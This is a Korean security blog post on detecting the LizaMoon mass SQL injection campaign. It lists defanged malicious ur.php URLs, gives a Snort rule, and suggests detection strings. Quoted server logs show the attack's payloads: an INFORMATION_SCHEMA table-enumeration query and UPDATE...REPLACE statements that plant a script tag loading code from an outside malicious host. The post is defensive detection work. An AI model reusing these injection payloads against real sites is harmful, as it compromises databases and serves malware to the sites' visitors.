lizamoon 관련 네트워크단 탐지

요즘 websense에서도 그렇고 lizamoon관련 MASS SQL 삽입관련 하여 많이 이슈됐죠.

 

여러사이트 물론 한국 사이트 포함하여 다음과 같은 URL이 삽입되었다고 합니다. websense에 따르면. 실지로도 그렇고요.

 

hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php

 

 

링크된 주소들을 탐지하는것도 방법이겠지만.

예를 들면 다음과 같이요.

alert tcp any any -> any any (flow:established, to_server; uricontent:”ur.php”; content:”|d0a0|Host|3a20|lizamoon.com”; nocase;)

SQL 삽입시도를 탐지하는것도 방법이죠.

이공격 관련 로그를 보면

2011-03-11 16:34:45 W3SVC1746246233 *MYSERVERIP* GET /dir/linkdetail.aspx id=11011+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+not+in+(SELECT+TOP+0+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))– 80 – 91.217.162.45 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) 500 0 0

 

Doc.asp?id=PU12731+update+gCategoriasHistoricoTiposDescripciones+set+Descripcion=REPLACE(cast(Descripcion+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ….省略, 用CHR(nn)一个字符一个字符组出</title><script src=httq:// lazemoon .com / ur . php></script>…%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))– – 95.64.9.18 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) – 302 498

 

2011-03-29 17:56:49 <<my server ip address>> GET /<<pagename>>.asp prod=MG0011’+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ….省略, 用CHR(nn)一个字符一个字符组出</title><script src=httq:// lazemoon .com / ur . php></script>… %2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))– 80 – 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax)

 

SQL 삽입문구를 uricontent로 탐지하면 될듯합니다.혹은 script삽입을 uri필드에서 할경우 탐지해도되겟죠 오탐이 있을수도 있지만.

 

이런 것들 탐지하면 될듯합니다.

SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES

update+gCategoriasHistoricoTiposDescripciones+set+Descripcion

update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),

Advertisements

About this entry